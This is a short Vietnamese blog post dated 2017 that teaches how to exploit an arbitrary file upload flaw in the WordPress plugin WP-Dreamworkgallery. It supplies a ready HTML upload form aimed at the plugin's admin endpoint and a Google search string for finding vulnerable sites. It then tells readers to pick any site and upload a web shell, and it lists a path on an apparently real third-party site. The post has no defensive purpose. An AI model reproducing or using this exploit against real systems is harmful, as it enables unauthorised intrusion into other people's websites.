Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery
vào
03 thg 4, 2017
 |
| Khai thác lỗ hổng WordPress Plugin WP-Dreamworkgallery |
Lỗi này cho phép chúng ta UpShell lên một cách thoải mái thông qua một file .html ngay từ localhost
Bước 1: Tạo 1 file Upload.html
<html><body><form action="http://www.web-bị-lỗi.com/wp-admin/admin.php?page=dreamwork_manage" method="POST" enctype="multipart/form-data"><input type="hidden" name="task" value="drm_add_new_album" /><input type="hidden" name="album_name" value="Arbitrary File Upload" /><input type="hidden" name="album_desc" value="Arbitrary File Upload" /><input type="file" name="album_img" value="" /><input type="submit" value="Submit" /></form></body></html>
Bước 2: Tìm Web bị lỗi
Tìm lỗi bằng cách vào Google.com gõ lệnh
inurl:/wp-content/plugins/wp-dreamworkgallery/
Bước 3: Chọn 1 site bất kỳ
Thay link trang Web bị lỗi vào code ở Bước 1, nhớ Save lại nhé
Bước 4: Up Shell
Mở File Upload.html ở Bước 1 lên, và Up Shell lên
Lưu ý: Đoạn lỗi sau khi Up shell
Copy dòng này vào Link site bị lỗi là OK
http://www.presprint.rs/wp-content/uploads/dreamwork/334_uploadfolder/big/1.html
Nội dung chính
